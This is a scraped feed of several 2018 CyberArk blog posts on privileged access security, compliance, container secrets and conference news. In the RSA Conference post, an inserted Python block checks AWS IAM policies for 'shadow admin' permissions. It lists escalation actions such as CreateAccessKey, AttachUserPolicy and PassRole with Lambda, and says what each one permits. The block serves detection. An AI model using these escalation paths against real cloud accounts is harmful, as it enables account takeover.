While it is relatively easy to remove local admin rights for users (just Google “group policy to remove local admin rights” to see a few examples), doing so can make your end users very unhappy because now they won’t be able to install most applications, update drivers, etc., which will in turn result in more help desk calls. Over time this has the opposite effect, as local admin rights are then re-granted to more and more end users, putting you right back where you started. (Read this post on the importance of removing local admin rights from endpoints and how to effectively balance security and productivity in the process).

Furthermore, while Windows 10 helps companies start the process of separating admin privilege from standard users, it is still an all-or-nothing proposition. This is where CyberArk Endpoint Privilege Manager can help to fill the gap left by Windows 10 and the security team’s desire to remove local admin rights from end users. CyberArk enables customers to elevate a standard user to admin on a per-application basis, based on the user’s role within the organization. CyberArk can also reduce and control which applications a user is able to run in the first place. Lastly, CyberArk can protect privileged credentials from being stolen by blocking attempts to harvest credentials, including those that target browsers such as Vega Stealer.

So given all this, are you willing to gamble it all on an NGAV or EDR solution to protect you from attackers? Instead, layer into your endpoint security strategy a privilege management solution that enables you to effectively implement least privilege at your endpoints: control what users can run and how they run it, and help stop privilege theft from occurring at all.

If you are looking for a new way to stop attackers, let CyberArk help you implement an effective endpoint security strategy today and swing the odds in your favor.

]]>
Cybersecurity 500 List: CyberArk Named Most Innovative Privileged Access Security Company https://www.cyberark.com/blog/cybersecurity-500-list-cyberark-named-innovative-privileged-access-security-company/ Fri, 18 May 2018 15:10:03 +0000 https://www.cyberark.com/?p=24747/

According to the Official 2017-2018 Cybercrime Report by Cybersecurity Ventures, cyber crime will cost the world $6 trillion annually by 2021, up from $3 trillion in 2015. With that amount of money on the line, it is believed this crime “…will be more profitable than the global trade of all major illegal drugs combined.” How’s that for perspective?

To acknowledge the strength and reach of innovative companies focused on combating this ever-present threat, CyberSecurity Ventures unveiled its Cybersecurity 500 list this week. CyberArk is ranked as the top cybersecurity vendor – specifically CyberArk is the No. 1 privileged access security company on the list and the No. 3 company overall. The influential list identifies the world’s hottest and most innovative cybersecurity companies to watch in 2018.

The Cybersecurity 500 selection criteria include an evaluation of the company’s ability to address cybersecurity challenges in innovative ways, customer base, feedback from CISOs and decision makers, company growth and strength of the leadership team.

As organizations advance in their digital transformation, defense in depth is a necessary strategy to stay ahead of attackers and effectively protect critical information assets. The market-leading CyberArk Privileged Access Security Solution delivers a critical layer of protection against evolving security threats targeting credentials and secrets across cloud and DevOps environments and at the endpoint.

It’s an honor to be part of the company ranked alongside other industry disrupters, including Herjavec Group and KnowBe4. Sure, recognition is cool. It’s one way to know you are part of a team that’s on the right path. I know my colleagues are motivated by a mission to help protect organizations against cyber attacks and reduce risk created by privileged credentials and secrets.

Forgive the humblebrag, but this accolade comes on the heels of CyberArk’s recognition as a Cyber Defense Magazine InfoSec Award winner and an Info Security Products Guide Global Excellence Award winner. Just sayin’ it’s a good time to be at CyberArk. We are hiring too. Ok, now back to work.

]]>
May the Fourth Be With You: CyberArk Releases Privileged Access Security Solution version 10.3 https://www.cyberark.com/blog/long-time-ago-galaxy-far-far-awaythere-malicious-insider/ Fri, 11 May 2018 18:45:11 +0000 https://www.cyberark.com/?p=24576/

On the heels of “Star Wars Day” – May the 4th for the uninitiated – and just in time for the next release of the CyberArk Privileged Access Security Solution version 10.3, I’d like to make a correlation between the undisputed leader in the privileged access security market with the greatest epic space opera in film history.

It all started when a mathematician / theoretician / research scientist completed the design for the most coveted intergalactic weapon in history: the Death Star. Despite being held against his will to complete the space station, this researcher became a malicious insider of epic proportions against the Empire. During the development of this galactic super-weapon, he deliberately sabotaged its design by incorporating a weakness directly into the main reactor that had the potential to bring the starship to complete and utter ruin. Just before his untimely death, he reveals the location of the Death Star schematics, in a databank just a few clicks away in the outer rim territories of the galaxy.

At this point in the story, one cannot help but begin to question the internal policies of the Empire. The research facility was bombed by Rebel forces (bad), the entire development team responsible for the Death Star’s completion was totally wiped out (not good), and the Rebels escaped with the location of the schematics (really, really bad). In a very non-traditional fashion, Darth Vader then proceeds to slap the wrist of those responsible for the breach, which in hindsight was a huge mistake as shortly thereafter, an even bigger breach occurs. (Worst. Policy. Ever). Also, shame on Darth Vader for being so soft.

In the privileged access security universe, the databank where the schematics reside is essentially the target system to which an attacker is seeking to gain access. One can conclude that these plans for the Death Star are clearly sensitive assets given the weapon’s potential to destroy entire planets. Because of this, the Empire put in place many controls to keep these plans as far away from the Rebel Alliance as possible.

Cue the Imperial March

This is the part of the story that draws even deeper parallels. A defector and former Imperial pilot of the Galactic Empire joins the Rebel Alliance and uses stolen access codes (a.k.a. privileged credentials) from an Imperial cargo ship (a.k.a. privileged account) to gain clearance through a planet-wide protective force field (a.k.a. firewall) that sits between them and the databank. Upon requesting access, there’s a bit of push back from the gate control station (a.k.a. Domain Controller) as they were not listed on the schedule (a.k.a Active Directory). The Rebels then proceed to provide the stolen clearance codes and are ultimately given access to enter the single, main gate.

Like many organizations today, the Empire invested heavily in securing their perimeter, with a planet-wide defensive shield (which presumably cost a fortune in Galactic Credits), but it neglected to consider the implications of an attack that’s launched from within. Before providing the clearance codes, the Rebels were worried about being denied access and blown to smithereens, quoting directly from the movie “…assuming the Empire hasn’t logged them (referring to the access codes) as overdue” – this is a clear indication that even the most basic of security controls in the management of privileged credentials were not in place. As a result, access to one of the Empire’s most valued assets was inadvertently provided to Rebel forces.  

Fast forward: the shield gate is destroyed, yet another set of privileged credentials is used to retrieve and exfiltrate the schematics to Rebel forces, where they identify the space station’s vulnerability, and just a few short years later Luke Skywalker takes it from there and (spoiler alert) blows up the Death Star.

There’s Hope Yet…

Despite being entirely based on science fiction, the attack methodologies that challenged the Empire exist for organizations today. Fortunately, we have advanced cyber security defense solutions in the real world.

The CyberArk Privileged Access Security Solution v10.3 can be used to mitigate the risk of an insider attack like the one referenced in this blog. This version features several new enterprise-ready enhancements and capabilities that:

  • Simplify and improve the ease of use with additional user interface enhancements for password management
  • Deliver optimized deployment functionality with rapid installation of individual CyberArk components as well as the automatic hardening of those components
  • Enhance CyberArk cloud security capabilities with support for Amazon Web Services CloudFormation Templates (CFTs)
  • Provide direct access to active and recorded sessions, added support for Windows 2016 Servers (LTSC) and much more!

The one feature most relevant to this story is the enhancements associated with the new CyberArk Privileged Threat Analytics user interface, which provide security operations teams with a modernized, comprehensive view of all privileged, threat-related detection and analytics. Beyond improved internal policy and basic credential management enforcement, advanced analytics capabilities would have benefited the Empire by providing granular, detailed information such as a risk severity score (see Figure 1. below). The scoring is generated automatically and an automated alert is pushed out. If used by Imperial security teams and the necessary action was taken, then the attack would have been prevented from taking place from the earliest stage in the attack chain – which all began with stolen privileged credentials.

Figure 1.  The new CyberArk Privileged Threat Analytics dashboard, integrated with Password Vault Web Access, displays a timeline of security events with associated risk scores for each activity.

Additionally, everything we do at CyberArk reinforces a ‘trust but verify’ approach that enables users to perform all of their respective tasks without the introduction of burdensome processes that could negatively impact their performance. Existing customers can read the full details in the release notes and upgrade to Version 10.3 in the CyberArk Support Vault.

Visit www.cyberark.com for more information on how to protect your Empire’s most critical resources from Rebel scum.

]]>
Preparing for the Next European Union Directive: EU NIS https://www.cyberark.com/blog/preparing-next-european-union-directive-eu-nis/ Wed, 09 May 2018 14:14:25 +0000 https://www.cyberark.com/?p=24497/

It’s fair to say the General Data Protection Regulation (GDPR) has received attention in recent months, and even more so as we creep closer to its enforcement date of May 25. It’s only a matter of time until the first major breach occurs, and then we’ll see how things shake out from an enforcement standpoint. Meanwhile, there’s exciting news for compliance jockeys like myself. Another directive from the European Parliament and the Council of the European Union is ramping up: Directive (EU) 2016/1148, also known as the “Directive on Security of Network and Information Systems (NIS).” The Directive was originally issued a few years ago and focused on measures for a “high common level of security of network and information systems across the Union.”

The effect the NIS Directive has on industry sectors is wide ranging, from energy and banking to air transport and drinking water suppliers. Implementation of the Directive is well underway with the next big milestone scheduled for May 9. Key dates also extend out for nearly five years after the transposition. The 27 articles within the Directive are riddled with compulsory legal jargon and will likely not make the list of 2018 summer beach reads. However, the European Commission did us all a favor and released a summarized memorandum highlighting the three core objectives:

  • Improved cybersecurity capabilities at the national level
  • Increased EU-level cooperation
  • Risk management and incident reporting obligations for operators of essential services and digital service providers

Improving Cyber Security at the National Level

Upon going through all of the various articles and definitions, the one word that continues to come to mind is access. Per the NIS Directive, security of network and information systems is defined as:

“…the ability of network and information systems to resist, at a given level of confidence, any action that compromises the availability, authenticity, integrity or confidentiality of stored or transmitted or processed data or the related services offered by, or accessible via, those network and information systems…”

As organizations within the member states mold their security strategies to align with the Directive, incorporating the security and management of privileged access as part of that strategy is critically important in the protection of networks and information systems. Unsecured secrets, privileged accounts and their associated credentials can provide an attacker with the ability to take complete control over an environment, disable systems and take down services that can impact an entire city’s population – hundreds of thousands of civilians – as shown in the Ukrainian power grid attack.

Placing controls on privileged users – both humans and machines – is a crucial step in mitigating risk against a security event that impacts critical services. Introducing the principle of least privilege, enforcing things such as multi-factor authentication and segregation of duties (SoD), and locking down the privileged access pathway to systems and applications are fundamental measures that can be implemented to resist the compromise of critical services and systems, upon which EU citizens and businesses rely.

Taking it one step further, the application of threat detection and analytics on privilege-related activity will help to prevent an attacker from comfortably navigating the network, performing reconnaissance and gaining access to the Domain Controllers where they can harvest the accounts and credentials that provide privileged access – which is exactly what the attackers did in the Ukrainian attack. Improving cyber security at the national level does not happen without the implementation of some of these security controls.

Cooperation amongst Union Member States

This part of the Directive is instrumental in successfully developing trust and confidence throughout the Union. This section defines a ‘Cooperation Group’ requiring member states to jointly plan and steer, share best practices, and report on and assess the overall experience gained through cooperation. Of course, consistency in the interpretation of this legislation across all member states is ideal for success. Cross-border communication and cooperation will be implemented more effectively if each member state is on the same page.

Member states such as France and Germany have already begun to release local legislation, while many others are slowly working out the final details before the transposition goes into national law later this year. Unlike GDPR, penalties for non-compliance will not be enforced at the EU level but directly by each member state; specifically, they “shall be effective, proportionate, and dissuasive.”

In the recent CyberArk Threat Landscape Report, only about one-third of respondents from organizations based in France (29 percent) and Germany (33 percent) said they have an understanding of the Directive, which types of security incidents should be reported, and that their organization currently meets local legislation.

As with GDPR, these stats are a clear indicator that organizations are not fully prepared. The likelihood of many organizations being in a comfortable state to avoid non-compliance may be bleak.

Risk Management and Incident Reporting

Digital Service Providers (DSPs) and operators of essential services will be required to put in place technical and organizational measures to prevent risk, ensure the level of security of network and information systems is appropriate to said risk, and effectively handle incidents to prevent and minimize the impact on the IT systems used to deliver services.

Whether data and applications are cloud native, running in a traditional on-premises environment or a combination of the two, nefarious characters and nation-state attackers continue to find ways to compromise the infrastructure and gain access to top tier resources.  Some of the definitions within the Directive are deliberately ambiguous for local interpretation – but the one thing that remains crystal clear is the management and prevention of risk begins and ends with protecting access to an organization’s most critical assets and resources.

Achieve a Higher Level of Security for Network and Information Systems

In my younger years of questionable intelligence and irresponsibility, I was once pulled over by a police officer who asked me the standard “do you know why I’m pulling you over” question, to which I replied with a youthful response of “no.” The end result was a hefty speeding ticket and the officer informing me that “ignorance is no excuse for the law.” The same rule applies here. Like GDPR, doing nothing in preparation for EU Directives is not only considered regulatory blasphemy, but it has the potential to result in serious reputational and financial repercussions (that undoubtedly far exceed the shame and cost of a speeding ticket that you got when you were 19 years old, driving around at some ungodly speed).

For nearly two decades, the CyberArk Privileged Access Security Solution has helped customers to support compliance with numerous, both public and private, regulatory compliance and security frameworks. Partner with the #1 undisputed leader in privileged access security and achieve a higher level of security for your network and information systems. Contact us to see how we can help support your compliance program today.

]]>
Simplify and Improve Container Security Using New CyberArk Conjur Integrations with Kubernetes and Red Hat OpenShift https://www.cyberark.com/blog/simplify-improve-container-security-using-new-cyberark-conjur-integrations-kubernetes-red-hat-openshift/ Tue, 08 May 2018 15:50:36 +0000 https://www.cyberark.com/?p=24481/

This week at the Red Hat Summit, we’re introducing two new integrations that improve container security. CyberArk Conjur Enterprise now offers general availability support for the Red Hat OpenShift Container Platform and Kubernetes. This is in addition to previously announced enterprise-level support for Pivotal Cloud Foundry and Docker.

While container platforms provide some security, organizations face specific challenges for protecting the secrets and credentials needed for a containerized workflow. These challenges include:

  • Potential inadvertent exposure of secrets and other credentials
  • Limited, if any, runtime authentication processes to ensure the calling container (requesting the secret) is the correct (authenticated) application container
  • A lack of segregation of duties between different application containers as well as between the application secrets and the container platform admin
  • Limited audit trails
  • Limited, if any, rotation of secrets

Red Hat OpenShift and Kubernetes
OpenShift is a popular platform-as-a-service (PaaS) offering from Red Hat that is built on Docker and Kubernetes. Kubernetes is an open source, container-as-a-service (CaaS) project that originated from Google and appears to be emerging as the de-facto container orchestration tool. Docker is a widely used tool designed to make it easier to create, deploy and run applications by using containers. With the CyberArk Conjur integrations, enterprises can take advantage of micro-services by building powerful, secure container environments.

Simplified Secrets Management for Containers
The integrations between OpenShift/Kubernetes and CyberArk Conjur Enterprise simplify secrets management for containers and strengthen container security in a seamless and native way. This enables organizations to more securely deploy enterprise applications at scale. For example, with these integrations, organizations using OpenShift or Kubernetes can leverage CyberArk Conjur Enterprise to secure, manage and rotate secrets and other credentials by authenticating the pods and then securely passing secrets stored in CyberArk Conjur to the application’s containers.

CyberArk Conjur Enterprise is designed to ensure secrets are never exposed to third parties, and the Conjur integration enhances security for OpenShift environments by providing:

  • End-to-end encryption of secrets through mutual TLS (Transport Layer Security).
  • Robust authentication and authorization incorporating Conjur policy, signed certificates, and an internal Kubernetes authenticator.
  • Separation of duties and other policies by letting OpenShift security teams control container access while development teams define application requirements.
  • Easy deployment of applications across environments and pods.
  • Scalability and performance advantages of the Conjur master-follower architecture. Followers serve read-only requests from client containers and applications, so scaling out is a matter of adding more followers.
  • Secret rotation, centralized auditing, and all other advantages of Enterprise Conjur.

Ease of Use for Developers
With these integrations, developers can meet security requirements without changing their application code. CyberArk Conjur Enterprise was designed specifically for developers, with the goal of letting them focus on development. For example, security policies can be written and managed as code in YAML files, which makes them easier to establish and maintain. Policy files can be checked into version control and reused across development, test and production environments.

True End-to-End Credential Management Across The Enterprise – No Security Islands
Another advantage of the integrations is that organizations gain policy-based secrets and credential management across their entire enterprise. With the integration between CyberArk Conjur Enterprise and Red Hat OpenShift, secrets and credentials managed by the CyberArk Enterprise Password Vault can be automatically replicated into OpenShift or Kubernetes. Organizations can consistently manage access credentials and secrets across on-premises, hybrid and multi-cloud environments, as well as for OpenShift, Kubernetes, and other DevOps platforms and tools. Conjur can also run as a standalone solution and be integrated with the Vault if and when the enterprise chooses to.

Getting Started with Conjur Enterprise and OpenShift
The CyberArk Conjur Enterprise OpenShift and Kubernetes Integrations are available now. To learn more, view the on-demand OpenShift Commons Briefing: CyberArk Conjur Secrets Management demo and webinar, contact sales, or visit CyberArk.com/Conjur.  If you are at Red Hat Summit this week (May 8-11) please stop by booth #932 for a demo.

Conjur Open Source Also Available
CyberArk Conjur Open Source is freely available for trial or download on GitHub or Conjur.org and it supports many integrations with other open source DevOps tools. Everyone using Conjur Open Source is encouraged to join the Conjur Slack channel to communicate directly with the Conjur engineering team to ask questions and provide product feedback.

Privileged Access Security Lessons Learned from My Xbox Fail https://www.cyberark.com/blog/privileged-access-security-lessons-learned-xbox-fail/ Wed, 02 May 2018 13:41:55 +0000 https://www.cyberark.com/?p=24310/

I have a 10-year-old son, who like many boys his age, enjoys playing video games on the Xbox. He is only allowed to play on the weekends, and we adhere to some general guidelines around time limits. However, this is often circumvented by the, “I just need five more minutes!” which becomes another 30 minutes if we are not careful.

So imagine my surprise when my husband’s credit card was frozen due to concerns around fraudulent charges! It turns out that the charges were not fraudulent at all; instead, my son (who was either playing the part of a malicious or uninformed insider) had made several in-game purchases. The total bill was more than two Benjamin Franklins!

Of course I knew that Xbox security and parental controls were a good idea, but I just hadn’t gotten around to using them. Big mistake. Needless to say, this incident motivated me to implement the appropriate security controls on the Xbox, including: 1) a passkey needed to start the Xbox; 2) a separate account for my son with his own user name and password; 3) time limits managed by the system—not by humans who can sometimes get distracted or lose track of time; and 4) purchases cannot be made without authorization.

In some ways, my story is similar to that of many security teams who have failed to implement best practices to address their privileged access security risks because of limited bandwidth, priorities or other reasons. Amazingly, CyberArk’s recent 2018 Global Advanced Threat Landscape Report found that nearly half (46%) of IT security professionals rarely change their security strategy substantially—even after experiencing a cyber attack. This is absolutely mind-boggling to me, especially when the risks are so high in terms of fines, lost revenue and long-term reputational damage that a company can suffer if a breach is disclosed.

My #Xbox fail taught me three lessons that can also be applied to organizations as they gear up to implement privileged access security:

  1. Ignoring the problem is not a strategy. As we all know, ignoring a problem doesn’t make it go away, and I found out the hard way when we were hit with my son’s in-app charges while gaming on the Xbox. In most cases, the problem will only grow worse over time. (The Phoenix Project documents the concept of technical debt quite well.) This is especially true when it comes to managing privileged access. In fact, most organizations today have more privileged accounts, credentials and secrets to secure than ever before. Why?
  • As organizations and IT environments grow and transform in the digital era, more people and applications have access to sensitive systems and information—IT administrators of all types, privileged business users, SaaS admins and DevOps teams to name a few.
  • Regular employees with local admin privileges can unwittingly compromise systems by clicking on a link in a phishing email and installing a malicious application that steals credentials on their computer. This can set off a chain reaction (as attackers move laterally) through the organization if proper security controls are not in place.
  • There is a proliferation of non-human privileged actors, ranging from service accounts to credentials embedded in commonly deployed COTS (commercial off-the-shelf) applications to credentials used by newer cloud-native applications.

Not sure of where to find all of these privileged credentials? A good place to start is with CyberArk’s free DNA Scan tool that can discover where your unmanaged privileged credentials lurk and assess your current privileged account security risks.

  2. Failing to get educated is not a strategy. I had no excuse for not getting smart on Xbox security—there was a wealth of information online, at my fingertips. This also goes for security professionals. A good resource to consider is CyberArk’s new Trustee level training. This online training is 100 percent free and available to anyone interested in learning the basics of privileged access security. You can even tune in during your commute or while working out.
  3. Being unwilling to change any aspect of BAU (Business as Usual) is not a strategy. Sure, it would be great to beef up security without changing your BAU at all. But this just isn’t reality. In my family’s case, the adjustment to BAU means that now either my husband or I have to take turns unlocking the Xbox before my son can use it. Sure, it’s an extra step, but entirely worth it to avoid another credit card conundrum.

Similarly, organizations that deploy privileged access security controls will need to adjust some of their daily routines to reduce their privileged security risk. One of our customers shared a story about dealing with heavy resistance from a colleague in IT who said the sky would literally fall if he had to make any changes to his normal routine. Interestingly, once the person finally got around to making the change (readers can speculate on how that came about), he became the biggest advocate for securing more privileged credentials leveraging CyberArk.

Now I am not going to lie and say that my son turned into the biggest advocate of our new regime, but he probably figures that it beats the alternative, which would be a total Xbox nuclear winter scenario.

So whether you’d like some more tips on Xbox security or have your own lessons to share, feel free to reach out to me, @kcmestre, on Twitter.

RSA Conference 2018 – That’s a Wrap! https://www.cyberark.com/blog/rsa-conference-2018-thats-wrap/ Fri, 20 Apr 2018 19:18:06 +0000 https://www.cyberark.com/?p=24072/

With a monumental number of miles clocked while running around the RSA Conference floor and streets of San Francisco, I’m about to crash from a runner’s high. The week was jam-packed with conversations with customers, partners, peers and pioneers.

Although I didn’t get to attend all of the keynotes, the Cryptography Panel and “Five Most Dangerous Attacks” from the SANS Institute team were truly outstanding. Panelist Adi Shamir’s comment, “Velocity is a vector, but are we moving forward or backward?” was insightful and thought provoking, especially as companies aim to balance rapid innovation with security.

The “Five Most Dangerous Attacks” discussion gave an eye-opening view of how attacks are evolving. Ed Skoudis shared how attackers have advanced their techniques to stealthily gain insights by correlating data from multiple innocuous sources. Johannes Ullrich shared insights on a crypto-mining attack against an organization’s PeopleSoft infrastructure that netted $30K per month for the attackers, a better return than traditional ransomware attacks would deliver. James Lyne shared that ICS attacks, once directed solely at DCS and SIS systems, now target the sensors themselves. This was especially sobering when you consider that most ICS attacks are not financially motivated.

It was certainly hard to juggle attending the keynotes and sessions with all of the great activity at the CyberArk booth. The conversations there were fast and furious and provided a wealth of insights on how prospects, customers and partners are tackling the privileged access security problem.

Introducing the CyberArk Marketplace

We kicked off the week by unveiling the CyberArk Marketplace, the industry’s broadest and deepest portfolio of integrations with a privileged access security solution. The Marketplace is a reflection of our philosophy that effective security must be a team game. Featuring a growing library of integrations with partners including Okta, SailPoint, ForeScout, Tenable and more, customers have the ability to secure privileged access across their entire technology stack—from security and IT operations to cloud, DevOps and Robotic Process Automation software. We held live demonstrations of the Marketplace throughout the week at our RSA booth, receiving positive feedback on available resources and collaborative ways to grow the platform. Take a tour if you haven’t already, and let us know what you think on Twitter!

Security Is a Team Game

Decked out in his CyberArk team jersey, our EVP of Global Business Development Adam Bosnian sat down with ForeScout Chief Strategy Officer Pedro Abreu to discuss this “team game” approach to security. I’ll share some highlights—you can watch the full interview here.

  • “Silver bullets don’t tend to work in security.” There is no one solution that solves today’s—let alone tomorrow’s—security challenges. We have a responsibility to work better together against our common enemy, the attacker.
  • “Know what you own.” After a breach, far too many organizations point to vulnerabilities or assets they never even knew existed as the culprits. The way to address this is through constant discovery of your environment. Attackers are innovative, so you have to account for every single thing connected to your network—from databases to fish tank thermometers. From there, it’s important to automate processes and integrate tools to enable seamless orchestration across your security fabric. This will help to accelerate time to response—whether that be ForeScout taking suspicious devices off the network, CyberArk shutting down the privileged pathway, or another security tool taking action.
  • “Data is the ‘oil’ of the new economy, and machine learning is the new ‘combustion engine.’” AI depends on rich, contextual data. Together, ForeScout and CyberArk are providing this critical threat intelligence and insight into organizations’ network security posture and the areas that are most vulnerable to attack.

Secure Privilege. Stop Attacks.

Another resounding theme at this year’s show was the integral role privileged access plays in security in the digital transformation era. To illustrate these dangers, CyberArk Labs team researchers Lavi Lazarovitz and Asaf Hecht presented an RSA talk, “Sneak Your Way to Cloud Persistence—Shadow Admins Are Here to Stay,” on new, stealthy ways to maintain persistence in public cloud platforms. Using cloud shadow admins in AWS as an example, the presentation revealed how changing just one line of IAM policy can devastate an entire environment. The team also introduced an open source scanning tool to help blue and red teams mitigate these new threats. You can check out their presentation slides and this ThreatPost article for more details.
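The "one line of IAM policy" point deserves a concrete illustration. The block below is an added example, not the scanning tool the CyberArk Labs researchers released and not code from this post: a self-contained checker that walks an IAM policy document and reports permissions that quietly amount to administrator access (minting keys for other users, attaching policies, PassRole paired with a service that executes code as the passed role). It goes slightly beyond the single-line case in the talk by handling wildcards, NotAction, explicit Deny statements and self-scoped resources. The escalation action lists are a hand-picked subset (an assumption, not a complete catalogue), and the three sample policies at the bottom are constructed.

```python
"""Flag IAM policy statements that grant 'shadow admin' power.

Added example, not the scanner the CyberArk Labs researchers released. The
action lists are a hand-picked subset (assumption) and the sample policies
are constructed.
"""
import fnmatch

# Single actions that let a principal grant itself, or a principal it
# controls, more permissions, or take over another principal outright.
STANDALONE_ESCALATION = {
    "iam:CreateAccessKey": "mint API keys for any user, including admins",
    "iam:CreateLoginProfile": "set a console password for a user that has none",
    "iam:UpdateLoginProfile": "reset any user's console password",
    "iam:AttachUserPolicy": "attach AdministratorAccess to a user",
    "iam:AttachGroupPolicy": "attach AdministratorAccess to a group",
    "iam:AttachRolePolicy": "attach AdministratorAccess to a role",
    "iam:PutUserPolicy": "write an inline admin policy on a user",
    "iam:PutGroupPolicy": "write an inline admin policy on a group",
    "iam:PutRolePolicy": "write an inline admin policy on a role",
    "iam:CreatePolicyVersion": "rewrite an attached managed policy as admin",
    "iam:SetDefaultPolicyVersion": "switch a managed policy to a looser version",
    "iam:AddUserToGroup": "join an admin group",
    "iam:UpdateAssumeRolePolicy": "let yourself assume any role",
}

# iam:PassRole is harmless alone; paired with a service that runs code under
# the passed role, it hands over that role's permissions.
PASSROLE_PARTNERS = {
    "ec2:RunInstances": "launch an instance under a privileged instance profile",
    "lambda:CreateFunction": "create a function that executes as a privileged role",
    "cloudformation:CreateStack": "deploy a stack that acts as a privileged role",
}


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(pattern, action):
    # IAM action matching is case-insensitive and supports '*' and '?'.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def _statements(policy, effect):
    return [s for s in _as_list(policy.get("Statement")) if s.get("Effect") == effect]


def _granted(policy, action):
    """True if `action` is allowed beyond the caller's own identity and not denied outright."""
    for stmt in _statements(policy, "Deny"):
        denied = any(_matches(p, action) for p in _as_list(stmt.get("Action")))
        if denied and "*" in _as_list(stmt.get("Resource")):
            return False
    for stmt in _statements(policy, "Allow"):
        if "NotAction" in stmt:
            # NotAction allows everything except the listed actions.
            if any(_matches(p, action) for p in _as_list(stmt["NotAction"])):
                continue
        elif not any(_matches(p, action) for p in _as_list(stmt.get("Action"))):
            continue
        # Heuristic: a resource tied to ${aws:username} is self-service; anything
        # else, and '*' in particular, reaches other principals.
        resources = _as_list(stmt.get("Resource", "*"))
        if any("${aws:username}" not in r for r in resources):
            return True
    return False


def shadow_admin_findings(policy):
    """Return (action, why) pairs for every escalation path the policy grants."""
    findings = [(a, why) for a, why in STANDALONE_ESCALATION.items() if _granted(policy, a)]
    if _granted(policy, "iam:PassRole"):
        findings += [("iam:PassRole+" + a, why) for a, why in PASSROLE_PARTNERS.items()
                     if _granted(policy, a)]
    return findings


# Constructed sample policies (not from any real account).
HELPDESK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:ListUsers", "iam:GetUser"], "Resource": "*"},
        # One innocuous-looking line: the holder can mint keys for any user, admins included.
        {"Effect": "Allow", "Action": "iam:CreateAccessKey", "Resource": "*"},
    ],
}
SELF_SERVICE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:CreateAccessKey", "iam:UpdateLoginProfile"],
         "Resource": "arn:aws:iam::123456789012:user/${aws:username}"},
    ],
}
DEPLOYER_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["lambda:*", "iam:PassRole", "iam:CreateAccessKey"],
         "Resource": "*"},
        # The Deny neutralises CreateAccessKey, but PassRole + lambda:* survives.
        {"Effect": "Deny", "Action": "iam:CreateAccessKey", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    for name, pol in [("helpdesk", HELPDESK_POLICY), ("self-service", SELF_SERVICE_POLICY),
                      ("deployer", DEPLOYER_POLICY)]:
        print(name, shadow_admin_findings(pol))
```

The self-service policy is the interesting negative case: the same `iam:CreateAccessKey` action is benign when the resource is pinned to `${aws:username}`, which is why a checker that only greps action names produces noise. In a real account the policy documents would come from `iam:GetPolicyVersion` and `iam:GetUserPolicy` output rather than inline dicts.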

As enterprises automate IT infrastructure and institute DevOps methodologies to accelerate innovation, processes and technologies must be put in place to secure both machine and human identities. In her RSA talk, “Rise of the Machines: DevOps and the Role of Secrets Management,” CyberArk Vice President, DevOps Security, Elizabeth Lawler shared ways to apply traditional privileged access management concepts to nonhuman network entities (processes, microservices, containers) to automate IT without compromising security or velocity. Get the details in her presentation slides and check out the CyberArk Conjur open source tool.

That’s a Wrap

As we continue to innovate and deliver industry-leading security solutions that help organizations protect against advanced threats, we were honored to receive two prestigious industry awards during this year’s conference: Cyber Defense Magazine’s InfoSec Award for “Next Gen Privileged Account Security” and the Info Security Products Guide Global Excellence Award for “Privileged Access Management.” We appreciate this recognition, and we will not rest on our laurels. Attackers never sleep, after all.

It was great to pause—to unite as an industry, with a shared goal of stopping attacks and protecting precious assets of people and businesses. But, there’s much to be done and it’s time to get back to work. Until next year, RSA Conference!

Security is a Team Game—Join the Big Leagues in CyberArk Marketplace https://www.cyberark.com/blog/security-team-game-join-big-leagues-cyberark-marketplace/ Mon, 16 Apr 2018 12:35:27 +0000 https://www.cyberark.com/?p=23969/

Today’s security and compliance environment is rapidly changing, presenting new challenges to organizations that no single solution or vendor alone can fully address. That’s why we view security as a team game and have a vested interest in creating a powerful ecosystem of partners that can provide organizations with holistic, tailored solutions to meet their evolving security needs—both today and tomorrow.

As we continue to advance our position as the global leader in privileged access security, we’re thrilled to unveil the CyberArk Marketplace, a one-stop-shop comprised of the industry’s broadest and deepest portfolio of integrations with a privileged account security solution.

Underscoring the importance of a “team game” approach, the new CyberArk Marketplace further supports our customers in building best-of-breed security fabrics within their organizations, in which components are tightly woven together and enrich one another. Organizations have invested in a security portfolio, and likewise, we have invested time and resources into developing and testing the integrations to maximize security across the enterprise with enriched, bi-directional data flowing across solutions.

The CyberArk Marketplace is designed to take the often-laborious process of developing solution integrations off of the organization’s workload. It provides unprecedented simplicity, cost-efficiencies and speed for security and IT operations teams who want to extend the benefits of securing and leveraging privileged access and data across the enterprise, in the cloud and throughout the DevOps pipeline.

With the CyberArk Marketplace, organizations benefit from:

  • Heightened visibility and awareness. Get a comprehensive look at all current CyberArk integrations and partnerships in an intuitive dashboard view that is easy to understand and share with team members across your organization.
  • Granular information—where and when you need it. The CyberArk Marketplace houses all of the technical integration components—from plugins to APIs to support tools—you need to get your integration up and running quickly.
  • Insights on tap from the larger security community. As the Marketplace grows, it will foster collaboration, engagement and bi-directional information sharing—providing a valuable resource for organizations as they progress on their security and digital transformation journeys.

As we gear up for an exciting and jam-packed week at RSA Conference, we look forward to sharing the CyberArk Marketplace with customers and partners on the show floor, hearing your integration stories and discussing ways to collaboratively grow this new resource.

Visit the CyberArk Marketplace today, and if you’re traveling to San Francisco this week, be sure to stop by our RSA booth #4201!

Once you have taken a tour, we’d love to hear your feedback. Reach us on Twitter @CyberArk.

Cloud Security Risks and Responsibilities https://www.cyberark.com/blog/cloud-security-risks-responsibilities/ Fri, 06 Apr 2018 13:38:12 +0000 https://www.cyberark.com/?p=23808/

As public cloud utilization—specifically Infrastructure-as-a-Service (IaaS) and Platform-as-a-Service (PaaS)—continues to surge, questions around cloud security responsibility linger. Though public cloud vendors such as Amazon and Google emphasize customers’ shared responsibility in securing cloud workloads, too many organizations continue to place the onus on their infrastructure providers.

Organizations that rely solely on a cloud vendor’s built-in security expose themselves to unnecessary risk, and painful lessons have already been learned. This is particularly true for the credentials and secrets that proliferate in cloud environments and automated processes. These secrets are created dynamically and assigned to provision, configure and manage hundreds of thousands of machines and microservices, yet many are never secured. If compromised, they give attackers a jumping-off point for lateral movement across networks, data and applications, and ultimately a path to an organization’s most critical assets.

